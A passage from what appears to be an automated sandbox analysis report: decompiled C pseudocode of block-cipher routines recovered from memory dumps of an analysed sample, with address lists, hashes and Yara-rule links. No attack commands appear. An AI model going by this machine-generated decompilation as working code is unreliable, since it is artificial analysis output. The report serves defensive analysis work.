						_t142[3] = _t133 ^ _t66 ^ _t133 ^ _t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b ^ _t133 ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b ^ _t66 ^ _t133 ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b ^ _t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b ^ _t133 ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b ^ (_t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b) + _t90 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t90) >> 0x00000007) & 0x1b1b1b1b;
					} while (_t142 < _a12);
					return 0;
				} else {
					return _t46;
				}
			}















                                                              0x00ba17e0
                                                              0x00ba17e8
                                                              0x00ba17f3
                                                              0x00ba1804
                                                              0x00ba1808
                                                              0x00ba1812
                                                              0x00ba1814
                                                              0x00ba1817
                                                              0x00ba1819
                                                              0x00ba1828
                                                              0x00ba182b
                                                              0x00ba182e
                                                              0x00ba1831
                                                              0x00ba1834
                                                              0x00ba1837
                                                              0x00ba183a
                                                              0x00ba1842
                                                              0x00ba1853
                                                              0x00ba1857
                                                              0x00ba185c
                                                              0x00ba185c
                                                              0x00ba187c
                                                              0x00ba189d
                                                              0x00ba18be
                                                              0x00ba18cc
                                                              0x00ba18d3
                                                              0x00ba18d8
                                                              0x00ba18dd
                                                              0x00ba18e1
                                                              0x00ba1900
                                                              0x00ba1921
                                                              0x00ba1941
                                                              0x00ba194f
                                                              0x00ba1956
                                                              0x00ba195b
                                                              0x00ba1960
                                                              0x00ba1964
                                                              0x00ba1984
                                                              0x00ba19a4
                                                              0x00ba19c5
                                                              0x00ba19d3
                                                              0x00ba19da
                                                              0x00ba19df
                                                              0x00ba19e4
                                                              0x00ba19e8
                                                              0x00ba1a07
                                                              0x00ba1a28
                                                              0x00ba1a49
                                                              0x00ba1a57
                                                              0x00ba1a5e
                                                              0x00ba1a63
                                                              0x00ba1a68
                                                              0x00ba1a6c
                                                              0x00ba1a6f
                                                              0x00ba1a7f
                                                              0x00ba17ee
                                                              0x00ba17ee
                                                              0x00ba17ee

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf9c5f45ff5331f10078ff6609bca2f4b5b29b5a7334825905b9768d2345f1f6
                                                              • Instruction ID: c7759b741aece55742f483971d6d96d2b47c575d2fd427b3da78c1dd087a33aa
                                                              • Opcode Fuzzy Hash: cf9c5f45ff5331f10078ff6609bca2f4b5b29b5a7334825905b9768d2345f1f6
                                                              • Instruction Fuzzy Hash: 6E71D5B3E24F294F8314DEB98D84152B2F1EB84520F4A867ECE5193B41E7707A5A86C0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA2850, Relevance: .2, Instructions: 219COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00BA2850() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t154;
				unsigned int _t156;
				intOrPtr _t157;
				intOrPtr _t158;
				void* _t162;
				char* _t163;
				signed char* _t164;
				void* _t179;
				void* _t182;
				signed int _t204;
				signed int* _t211;
				intOrPtr _t212;
				intOrPtr _t217;
				signed int* _t218;
				signed int* _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				signed int _t224;
				void* _t226;
				signed int _t228;

				E00C6BB10(0x3c);
				_t126 =  *0xcc5970; // 0x851ab4dd
				 *(_t228 + 0x38) = _t126 ^ _t228;
				_t128 =  *(_t228 + 0x4c);
				_t156 =  *(_t228 + 0x4c);
				_t224 =  *(_t228 + 0x48);
				_t220 =  *(_t228 + 0x5c);
				_t211 =  *(_t228 + 0x54);
				 *(_t228 + 0x24) =  *(_t228 + 0x4c);
				 *(_t228 + 0x1c) =  *(_t228 + 0x54);
				if(_t224 == _t211) {
					if(_t156 >= 0x10) {
						 *(_t228 + 0x14) = _t156 >> 4;
						do {
							 *((intOrPtr*)(_t228 + 0x28))(_t224, _t228 + 0x3c,  *(_t228 + 0x24));
							_t204 =  *_t220 ^  *(_t228 + 0x44);
							_t228 = _t228 + 0xc;
							 *_t211 = _t204;
							 *_t220 =  *_t224;
							_t211[1] = _t220[1] ^  *(_t228 + 0x3c);
							_t178 = _t220[2] ^  *(_t228 + 0x40);
							_t220[1] =  *(_t224 + 4);
							_t211[2] = _t220[2] ^  *(_t228 + 0x40);
							_t220[2] =  *(_t224 + 8);
							_t128 =  *(_t224 + 0xc);
							_t211[3] = _t220[3] ^  *(_t228 + 0x44);
							_t156 = _t156 - 0x10;
							_t224 = _t224 + 0x10;
							_t211 =  &(_t211[4]);
							_t53 = _t228 + 0x14;
							 *_t53 =  *(_t228 + 0x14) - 1;
							_t220[3] = _t128;
						} while ( *_t53 != 0);
					}
				} else {
					_t128 = _t220;
					 *(_t228 + 0x18) = _t128;
					if(_t156 >= 0x10) {
						 *(_t228 + 0x14) = _t156 >> 4;
						do {
							 *((intOrPtr*)(_t228 + 0x28))(_t224, _t211,  *(_t228 + 0x24));
							_t154 =  *(_t228 + 0x24);
							 *_t211 =  *_t211 ^  *_t154;
							_t211[1] = _t211[1] ^ _t154[1];
							_t211[2] = _t211[2] ^ _t154[2];
							_t211[3] = _t211[3] ^ _t154[3];
							 *(_t228 + 0x24) = _t224;
							_t228 = _t228 + 0xc;
							_t156 = _t156 - 0x10;
							_t224 = _t224 + 0x10;
							_t211 =  &(_t211[4]);
							_t25 = _t228 + 0x14;
							 *_t25 =  *(_t228 + 0x14) - 1;
						} while ( *_t25 != 0);
						_t128 =  *(_t228 + 0x18);
					}
					 *_t220 =  *_t128;
					_t220[1] = _t128[1];
					_t220[2] = _t128[2];
					_t178 = _t128[3];
					_t220[3] = _t128[3];
				}
				if(_t156 == 0) {
					L27:
					_pop(_t212);
					_pop(_t221);
					_pop(_t157);
					return E00C69C26(_t128, _t157,  *(_t228 + 0x48) ^ _t228, _t178, _t212, _t221);
				} else {
					_t179 = _t228 + 0x38;
					 *((intOrPtr*)(_t228 + 0x28)) = _t220 - _t179;
					_t162 = _t179;
					 *((intOrPtr*)(_t228 + 0x34)) = 1 - _t162;
					 *((intOrPtr*)(_t228 + 0x2c)) = 2 - _t179;
					 *((intOrPtr*)(_t228 + 0x30)) = 3 - _t162;
					 *(_t228 + 0x18) =  &(_t211[0]);
					 *(_t228 + 0x14) = _t211 - _t162;
					 *((intOrPtr*)(_t228 + 0x20)) = _t224 - _t162;
					do {
						 *((intOrPtr*)(_t228 + 0x28))(_t224, _t228 + 0x3c,  *(_t228 + 0x24));
						_t228 = _t228 + 0xc;
						_t128 = 0;
						while(_t128 < _t156) {
							_t164 =  &(_t128[0xe]) + _t228;
							 *(_t228 + 0x13) = _t164[ *((intOrPtr*)(_t228 + 0x20))] & 0x000000ff;
							_t164[ *(_t228 + 0x14)] =  *_t164 & 0x000000ff ^ _t164[ *((intOrPtr*)(_t228 + 0x28))];
							_t164[ *((intOrPtr*)(_t228 + 0x28))] =  *(_t228 + 0x13) & 0x000000ff;
							if( *((intOrPtr*)(_t228 + 0x34)) + _t164 >= _t156) {
								_t128 =  &(_t128[0]);
							} else {
								_t218 =  *(_t228 + 0x18);
								 *(_t228 + 0x13) =  *(_t128 + _t224 + 1) & 0x000000ff;
								 *(_t218 + _t128 - 1) = _t164[1] & 0x000000ff ^  *(_t220 +  &(_t128[0]));
								 *(_t220 +  &(_t128[0])) =  *(_t228 + 0x13) & 0x000000ff;
								if( *((intOrPtr*)(_t228 + 0x2c)) + _t164 >= _t156) {
									_t128 =  &(_t128[0]);
								} else {
									 *(_t228 + 0x13) =  *(_t128 + _t224 + 2) & 0x000000ff;
									 *(_t218 + _t128) = _t164[2] & 0x000000ff ^  *(_t220 +  &(_t128[0]));
									 *(_t220 +  &(_t128[0])) =  *(_t228 + 0x13) & 0x000000ff;
									if( *((intOrPtr*)(_t228 + 0x30)) + _t164 >= _t156) {
										_t128 =  &(_t128[0]);
									} else {
										 *(_t218 +  &(_t128[0])) = _t164[3] ^  *(_t220 +  &(_t128[0]));
										 *(_t220 +  &(_t128[0])) =  *((intOrPtr*)(_t128 + _t224 + 3));
										_t128 =  &(_t128[1]);
										if(_t128 < 0x10) {
											continue;
										} else {
										}
									}
								}
							}
							break;
						}
						_t178 = 0x10;
						if(_t156 <= 0x10) {
							if(_t128 < 0x10) {
								_t226 = _t224 - _t220;
								_t163 = _t220 + _t128;
								_t182 = 0x10 - _t128;
								do {
									_t128 =  *((intOrPtr*)(_t163 + _t226));
									 *_t163 =  *((intOrPtr*)(_t163 + _t226));
									_t163 = _t163 + 1;
									_t182 = _t182 - 1;
								} while (_t182 != 0);
							}
							goto L27;
						} else {
							goto L22;
						}
						goto L28;
						L22:
						 *((intOrPtr*)(_t228 + 0x20)) =  *((intOrPtr*)(_t228 + 0x20)) + 0x10;
						 *(_t228 + 0x14) =  *(_t228 + 0x14) + 0x10;
						 *(_t228 + 0x18) =  &(( *(_t228 + 0x18))[4]);
						_t156 = _t156 - 0x10;
						_t224 = _t224 + 0x10;
					} while (_t156 != 0);
					_pop(_t217);
					_pop(_t222);
					_pop(_t158);
					return E00C69C26(_t128, _t158,  *(_t228 + 0x38) ^ _t228, 0x10, _t217, _t222);
				}
				L28:
			}



























                                                              0x00ba2855
                                                              0x00ba285a
                                                              0x00ba2861
                                                              0x00ba2865
                                                              0x00ba286e
                                                              0x00ba2873
                                                              0x00ba2878
                                                              0x00ba287d
                                                              0x00ba2881
                                                              0x00ba2885
                                                              0x00ba288b
                                                              0x00ba28fc
                                                              0x00ba2903
                                                              0x00ba2907
                                                              0x00ba2912
                                                              0x00ba291b
                                                              0x00ba291f
                                                              0x00ba2922
                                                              0x00ba292b
                                                              0x00ba2930
                                                              0x00ba2936
                                                              0x00ba293a
                                                              0x00ba2940
                                                              0x00ba294a
                                                              0x00ba294d
                                                              0x00ba2950
                                                              0x00ba2953
                                                              0x00ba2956
                                                              0x00ba2959
                                                              0x00ba295c
                                                              0x00ba295c
                                                              0x00ba2961
                                                              0x00ba2961
                                                              0x00ba2907
                                                              0x00ba288d
                                                              0x00ba288d
                                                              0x00ba288f
                                                              0x00ba2896
                                                              0x00ba289d
                                                              0x00ba28a1
                                                              0x00ba28a8
                                                              0x00ba28ac
                                                              0x00ba28b2
                                                              0x00ba28b7
                                                              0x00ba28bd
                                                              0x00ba28c3
                                                              0x00ba28c6
                                                              0x00ba28ca
                                                              0x00ba28cd
                                                              0x00ba28d0
                                                              0x00ba28d3
                                                              0x00ba28d6
                                                              0x00ba28d6
                                                              0x00ba28d6
                                                              0x00ba28dd
                                                              0x00ba28dd
                                                              0x00ba28e3
                                                              0x00ba28e8
                                                              0x00ba28ee
                                                              0x00ba28f1
                                                              0x00ba28f4
                                                              0x00ba28f4
                                                              0x00ba2968
                                                              0x00ba2ad0
                                                              0x00ba2ad4
                                                              0x00ba2ad5
                                                              0x00ba2ad7
                                                              0x00ba2ae2
                                                              0x00ba296e
                                                              0x00ba296e
                                                              0x00ba2976
                                                              0x00ba297a
                                                              0x00ba2983
                                                              0x00ba298e
                                                              0x00ba2999
                                                              0x00ba29a8
                                                              0x00ba29ac
                                                              0x00ba29b0
                                                              0x00ba29b4
                                                              0x00ba29bf
                                                              0x00ba29c3
                                                              0x00ba29c6
                                                              0x00ba29c8
                                                              0x00ba29d8
                                                              0x00ba29e0
                                                              0x00ba29ee
                                                              0x00ba29fa
                                                              0x00ba2a05
                                                              0x00ba2a7b
                                                              0x00ba2a07
                                                              0x00ba2a0c
                                                              0x00ba2a10
                                                              0x00ba2a1c
                                                              0x00ba2a25
                                                              0x00ba2a31
                                                              0x00ba2a7e
                                                              0x00ba2a33
                                                              0x00ba2a38
                                                              0x00ba2a44
                                                              0x00ba2a4c
                                                              0x00ba2a58
                                                              0x00ba2a83
                                                              0x00ba2a5a
                                                              0x00ba2a65
                                                              0x00ba2a69
                                                              0x00ba2a6d
                                                              0x00ba2a73
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba2a79
                                                              0x00ba2a73
                                                              0x00ba2a58
                                                              0x00ba2a31
                                                              0x00000000
                                                              0x00ba2a05
                                                              0x00ba2a86
                                                              0x00ba2a8d
                                                              0x00ba2abc
                                                              0x00ba2abe
                                                              0x00ba2ac0
                                                              0x00ba2ac3
                                                              0x00ba2ac5
                                                              0x00ba2ac5
                                                              0x00ba2ac8
                                                              0x00ba2aca
                                                              0x00ba2acb
                                                              0x00ba2acb
                                                              0x00ba2ac5
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba2a8f
                                                              0x00ba2a8f
                                                              0x00ba2a93
                                                              0x00ba2a97
                                                              0x00ba2a9b
                                                              0x00ba2a9d
                                                              0x00ba2a9f
                                                              0x00ba2aa7
                                                              0x00ba2aa8
                                                              0x00ba2aaa
                                                              0x00ba2ab9
                                                              0x00ba2ab9
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dee13329e3ec8f9dcf8828351503a78f365f383b957ad8070f3ddb8ee71631a4
                                                              • Instruction ID: 1f29f14bae9a827798a0a6c8b29450b51df529e73a6afd547e1c0c71f9bddae8
                                                              • Opcode Fuzzy Hash: dee13329e3ec8f9dcf8828351503a78f365f383b957ad8070f3ddb8ee71631a4
                                                              • Instruction Fuzzy Hash: 2F91687560C3418FC324CF29C58495AFBE1EFDA304F588AADE88987356D234EA49CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B99310, Relevance: .2, Instructions: 218COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1fcc43b6dec1d2a5d4b93e07f1dccf19a7351a6efeb9f8f549763149ed7a8214
                                                              • Instruction ID: 04ab3bc60375c91a478696af46b84624b5fc7622d316ae48fcb17c983fc62691
                                                              • Opcode Fuzzy Hash: 1fcc43b6dec1d2a5d4b93e07f1dccf19a7351a6efeb9f8f549763149ed7a8214
                                                              • Instruction Fuzzy Hash: A3A16224C1DF9987E7128B398542163F3A0BFBB248F15E71EFDD835812EB21B6D49281
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9FCB1, Relevance: .2, Instructions: 212COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7264c70299fa56e359571c6f703c96d6d5a10104b9f91aba4f0598870021b61
                                                              • Instruction ID: 154b4dc1b06180de48e29fc15ef32d43a0e32940a281ae837ecf76f651a77b75
                                                              • Opcode Fuzzy Hash: d7264c70299fa56e359571c6f703c96d6d5a10104b9f91aba4f0598870021b61
                                                              • Instruction Fuzzy Hash: 9971E826639F7A06DBC3DA3D881047BE7E1BE8910AB450956DC90F3281D73EDA4D7660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9FCB0, Relevance: .2, Instructions: 208COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3f6a2591c6a1714bf7261bac80aec65f1a127fd8b4b380c508f0496f22d439f2
                                                              • Instruction ID: b8d95e6a431c53f39eacb4d5b71438a416c1a9f8a9da9daab0c8b0e4ac270b66
                                                              • Opcode Fuzzy Hash: 3f6a2591c6a1714bf7261bac80aec65f1a127fd8b4b380c508f0496f22d439f2
                                                              • Instruction Fuzzy Hash: 2571E926639F7A06DBC3DA3D881047FE7E1BE8910AB450956DC90F3281D73EDA4D7660
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA2C00, Relevance: .2, Instructions: 206COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00BA2C00() {
				signed int* _t75;
				signed int* _t78;
				signed int* _t86;
				signed char _t87;
				signed int* _t90;
				intOrPtr* _t91;
				signed int _t95;
				signed int _t96;
				signed int* _t98;
				signed int* _t101;
				void* _t103;
				void* _t104;
				unsigned int _t105;
				intOrPtr _t108;
				intOrPtr _t109;
				signed char _t110;
				void* _t114;
				signed char* _t115;
				void* _t118;
				signed char* _t120;
				void* _t125;
				signed char* _t127;
				signed int* _t132;
				signed int* _t137;
				signed int* _t143;
				intOrPtr _t146;
				signed char* _t148;
				signed int _t151;
				signed int _t153;
				intOrPtr _t155;
				unsigned int _t159;
				void* _t164;
				void* _t167;
				void* _t168;
				void* _t169;

				E00C6BB10(4);
				_t151 =  *( *(_t168 + 0x1c));
				_t146 =  *((intOrPtr*)(_t168 + 0x28));
				if( *(_t168 + 0x20) == 0) {
					_t159 =  *(_t168 + 0x20);
					_t101 =  *(_t168 + 0x18);
					if(_t151 != 0) {
						while(_t159 != 0) {
							_t87 =  *_t101;
							_t115 =  *(_t168 + 0x1c);
							 *_t115 =  *(_t151 + _t146) ^ _t87;
							 *(_t151 + _t146) = _t87;
							_t101 =  &(_t101[0]);
							_t159 = _t159 - 1;
							_t151 = _t151 + 0x00000001 & 0x0000000f;
							 *(_t168 + 0x1c) =  &(_t115[1]);
							if(_t151 != 0) {
								continue;
							}
							break;
						}
						 *(_t168 + 0x18) = _t101;
						 *(_t168 + 0x20) = _t159;
					}
					if(_t159 >= 0x10) {
						 *((intOrPtr*)(_t168 + 0x30)) =  *(_t168 + 0x1c) - _t146;
						 *(_t168 + 0x10) = _t159 >> 4;
						do {
							 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
							_t168 = _t168 + 0xc;
							if(_t151 < 0x10) {
								_t104 = _t101 -  *(_t168 + 0x1c);
								_t86 = _t151 + _t146;
								_t114 = (0xf - _t151 >> 2) + 1;
								do {
									_t132 =  *((intOrPtr*)(_t168 + 0x30)) + _t86;
									_t153 =  *(_t132 + _t104);
									 *_t132 =  *_t86 ^ _t153;
									 *_t86 = _t153;
									_t86 =  &(_t86[1]);
									_t114 = _t114 - 1;
								} while (_t114 != 0);
								_t159 =  *(_t168 + 0x20);
								_t101 =  *(_t168 + 0x18);
							}
							 *(_t168 + 0x1c) =  &(( *(_t168 + 0x1c))[0x10]);
							 *((intOrPtr*)(_t168 + 0x30)) =  *((intOrPtr*)(_t168 + 0x30)) + 0x10;
							_t159 = _t159 - 0x10;
							_t101 =  &(_t101[4]);
							_t151 = 0;
							_t59 = _t168 + 0x10;
							 *_t59 =  *(_t168 + 0x10) - 1;
							 *(_t168 + 0x20) = _t159;
							 *(_t168 + 0x18) = _t101;
						} while ( *_t59 != 0);
					}
					if(_t159 != 0) {
						 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
						_t108 =  *((intOrPtr*)(_t168 + 0x28));
						_t103 = _t101 - _t108;
						_t109 = _t108 - _t146;
						_t168 = _t168 + 0xc;
						_t78 = _t151 + _t146;
						 *((intOrPtr*)(_t168 + 0x30)) = _t109;
						_t151 = _t151 + _t159;
						while(1) {
							_t148 = _t78 + _t109;
							_t110 = _t148[_t103];
							 *_t148 =  *_t78 ^ _t110;
							_t159 = _t159 - 1;
							 *_t78 = _t110;
							_t78 =  &(_t78[0]);
							if(_t159 == 0) {
								goto L31;
							}
							_t109 =  *((intOrPtr*)(_t168 + 0x30));
						}
					}
					goto L31;
				} else {
					_t105 =  *(_t168 + 0x20);
					if(_t151 != 0) {
						while(_t105 != 0) {
							_t143 =  *(_t168 + 0x18);
							 *(_t151 + _t146) =  *(_t151 + _t146) ^  *_t143;
							_t127 =  *(_t168 + 0x1c);
							 *_t127 =  *(_t151 + _t146);
							_t105 = _t105 - 1;
							_t151 = _t151 + 0x00000001 & 0x0000000f;
							 *(_t168 + 0x1c) =  &(_t127[1]);
							 *(_t168 + 0x18) =  &(_t143[0]);
							if(_t151 != 0) {
								continue;
							}
							goto L5;
						}
					}
					L5:
					if(_t105 >= 0x10) {
						_t137 =  *(_t168 + 0x18);
						_t120 =  *(_t168 + 0x1c);
						 *((intOrPtr*)(_t168 + 0x30)) = _t137 - _t146;
						_t95 = _t105 >> 4;
						 *(_t168 + 0x10) = _t95;
						_t96 = _t95 << 4;
						_t167 = _t120 - _t146;
						 *(_t168 + 0x1c) =  &(_t120[_t96]);
						 *(_t168 + 0x18) = _t137 + _t96;
						do {
							 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
							_t168 = _t168 + 0xc;
							if(_t151 < 0x10) {
								_t98 = _t151 + _t146;
								_t125 = (0xf - _t151 >> 2) + 1;
								do {
									 *_t98 =  *_t98 ^  *( *((intOrPtr*)(_t168 + 0x30)) + _t98);
									 *(_t98 + _t167) =  *_t98;
									_t98 =  &(_t98[1]);
									_t125 = _t125 - 1;
								} while (_t125 != 0);
							}
							 *((intOrPtr*)(_t168 + 0x30)) =  *((intOrPtr*)(_t168 + 0x30)) + 0x10;
							_t105 = _t105 - 0x10;
							_t167 = _t167 + 0x10;
							_t151 = 0;
							_t26 = _t168 + 0x10;
							 *_t26 =  *(_t168 + 0x10) - 1;
						} while ( *_t26 != 0);
					}
					if(_t105 == 0) {
						L31:
						_t75 =  *(_t168 + 0x2c);
						 *_t75 = _t151;
						return _t75;
					} else {
						 *((intOrPtr*)(_t168 + 0x40))(_t146, _t146,  *((intOrPtr*)(_t168 + 0x24)));
						_t169 = _t168 + 0xc;
						_t90 = _t151 + _t146;
						_t164 =  *((intOrPtr*)(_t168 + 0x24)) - _t146;
						_t118 =  *((intOrPtr*)(_t168 + 0x28)) - _t146;
						_t155 = _t151 + _t105;
						do {
							 *_t90 =  *_t90 ^  *(_t90 + _t164) & 0x000000ff;
							_t105 = _t105 - 1;
							 *((char*)(_t90 + _t118)) =  *_t90;
							_t90 =  &(_t90[0]);
						} while (_t105 != 0);
						_t91 =  *((intOrPtr*)(_t169 + 0x2c));
						 *_t91 = _t155;
						return _t91;
					}
				}
			}






































                                                              0x00ba2c05
                                                              0x00ba2c16
                                                              0x00ba2c19
                                                              0x00ba2c1d
                                                              0x00ba2d1e
                                                              0x00ba2d22
                                                              0x00ba2d28
                                                              0x00ba2d30
                                                              0x00ba2d37
                                                              0x00ba2d39
                                                              0x00ba2d3f
                                                              0x00ba2d41
                                                              0x00ba2d46
                                                              0x00ba2d47
                                                              0x00ba2d48
                                                              0x00ba2d4b
                                                              0x00ba2d4f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba2d4f
                                                              0x00ba2d51
                                                              0x00ba2d55
                                                              0x00ba2d55
                                                              0x00ba2d5c
                                                              0x00ba2d64
                                                              0x00ba2d6d
                                                              0x00ba2d71
                                                              0x00ba2d78
                                                              0x00ba2d7c
                                                              0x00ba2d82
                                                              0x00ba2d84
                                                              0x00ba2d92
                                                              0x00ba2d95
                                                              0x00ba2d96
                                                              0x00ba2d9c
                                                              0x00ba2d9e
                                                              0x00ba2da3
                                                              0x00ba2da5
                                                              0x00ba2da7
                                                              0x00ba2daa
                                                              0x00ba2daa
                                                              0x00ba2daf
                                                              0x00ba2db3
                                                              0x00ba2db3
                                                              0x00ba2dbc
                                                              0x00ba2dc0
                                                              0x00ba2dc4
                                                              0x00ba2dc6
                                                              0x00ba2dc8
                                                              0x00ba2dca
                                                              0x00ba2dca
                                                              0x00ba2dcf
                                                              0x00ba2dd3
                                                              0x00ba2dd3
                                                              0x00ba2d71
                                                              0x00ba2ddb
                                                              0x00ba2de4
                                                              0x00ba2de8
                                                              0x00ba2dec
                                                              0x00ba2dee
